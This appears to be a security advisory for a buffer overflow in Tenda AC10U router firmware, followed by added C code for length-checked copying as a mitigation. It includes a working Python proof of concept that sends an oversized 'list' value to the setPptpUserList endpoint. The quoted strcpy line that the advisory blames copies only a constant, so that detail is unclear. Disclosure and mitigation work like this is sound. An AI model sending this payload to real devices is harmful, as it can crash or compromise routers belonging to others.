AC10U v1.0 Firmware V15.03.06.48, AC10U v1.0 Firmware V15.03.06.49
The Tenda AC10U v1.0 Firmware V15.03.06.48 and AC10U v1.0 Firmware V15.03.06.49 have a buffer overflow vulnerability in the formSetPPTPUserList function. The Var variable receives the list parameter from a POST request and is later passed to the strcpy function. Because the user controls the value of list, the statement v4 = strcpy(Var, "~"); can cause a buffer overflow.

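import requests

# Target device address
ip = "192.168.1.1"
url = f'http://{ip}/goform/setPptpUserList'
# Oversized value for the list parameter
payload = b'a' * 1000
data = {
    'list': payload
}
# Send the POST request that reaches formSetPPTPUserList
requests.post(url, data=data)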
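
On the mitigation side, the following is an added example, not code from the firmware or from the original advisory: a length-checked copy of the list value that rejects oversized input instead of overflowing. The buffer size, the function names, and the use of '~' as an entry separator are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size; the advisory does not state the real buffer size. */
#define LIST_BUF_SIZE 256

/* Hypothetical bounded replacement for an unchecked strcpy of `list`.
 * Returns 0 on success, -1 if src is missing or does not fit.
 * dst is left as an empty string on failure. */
int copy_list_param(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len == dst_size)   /* no room for the terminator: reject, do not truncate */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Splits a validated buffer in place on '~' (assumed separator).
 * Returns the entry count, or -1 if more than max entries are present. */
int split_entries(char *buf, char *entries[], int max)
{
    int n = 0;
    char *p = buf;
    while (p != NULL && *p != '\0') {
        if (n == max)
            return -1;
        entries[n++] = p;
        p = strchr(p, '~');
        if (p != NULL)
            *p++ = '\0';
    }
    return n;
}

int main(void)
{
    char buf[LIST_BUF_SIZE], big[1001];   /* big: constructed 1000-byte input */
    memset(big, 'a', 1000); big[1000] = '\0';
    printf("oversized: %d\n", copy_list_param(buf, sizeof buf, big));
    printf("normal: %d\n", copy_list_param(buf, sizeof buf, "u1~u2"));
    return 0;
}
```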
